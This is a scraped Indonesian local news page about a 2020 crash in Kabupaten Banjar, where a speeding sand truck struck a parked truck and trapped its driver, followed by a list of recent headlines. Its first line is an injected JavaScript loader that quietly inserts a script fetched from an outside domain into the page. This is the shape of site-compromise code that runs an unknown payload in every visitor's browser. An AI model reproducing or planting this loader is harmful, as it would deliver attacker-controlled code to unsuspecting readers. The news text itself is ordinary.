(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kabupaten Banjar

Seruduk Buritan Truk Parkir, Sopir Terjepit Dalam Kabin


KANALKALIMANTAN.COM, MARTAPURA – Kecelakaan truk vs truk terjadi di jalan Gubernur Subarjo, Desa Malintang Baru, Kecamatan Gambut, Kabupaten Banjar –dekat garduk Induk PLN-, Senin (16/11/2020). Kecelakaan tersebut melibatkan sebuah truk dengan satu truk yang lainnya yang berada di depan.

Informasi yang diterima Kanalkalimantan, satu buah truk pengangkut pasir dengan kecepatan tinggi menabrak buritan truk yang sedang terparkir di tepi jalan. Ironisnya, sopir truk tersebut terjepit di dalam kabin kemudi.

Mendapat informarsi adanya kecelakaan tersebut, tim emergency gabungan langsung bergegas menuju ke TKP, dan melakukan evakuasi terhadap sopir truk yang terjepit.

Si sopir truk kritis dan menglami luka yang cukup parah di bagian kaki, dan langsung dilarikan ke RSUD Ulin Banjarmasin. Sopir truk tersebut ialah Budi warga asal Palangkaraya.

 

 

 

Adan teman korban mengatakan, korban yang saat itu membawa truk pengangkut pasir, tiba-tiba menabrak buritan truk yang sedang terpakir di tepi jalan.

“Korban dari Palangkaraya dan ingin menuju ke pelabuhan Trisakti, di jalan korban menabrak truk yang berhenti ingin ganti ban,” kata teman korban. Adan juga menjelaslan, truk yang sedang mengganti ban tersebut tidak memasang rambu-rambu.

“Kata orang di sana tidak ada rambu-rambu yang terpasang,” ucapnya.

Atas musibah tersebut, si sopir sempat terjepit di dalam ruang kemudi. Petugas emergency berhasil mengevakuasi korban yang sedang terjepit.

Korban yang menglami luka cukup parah di bagian badan hingga paha, sedang dalam perawatan di IGD RSUD Ulin Banjarmasin. (kanalkalimantan.com/wahyu)

Reporter : Wahyu
Editor : Bie

Al Ghifari

Recent Posts

Berbaur dengan Masyarakat, Bupati dan Wabup Banjar Nobar Indonesia Vs Uzbekistan

KANALKALIMANTAN.COM, MARTAPURA - Alun-alun Ratu Zalecha, Martapura dipilih menjadi tempat nonton bareng (nobar) Semi Final… Read More

4 jam ago

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

6 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

7 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

7 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

7 jam ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

7 jam ago

This website uses cookies.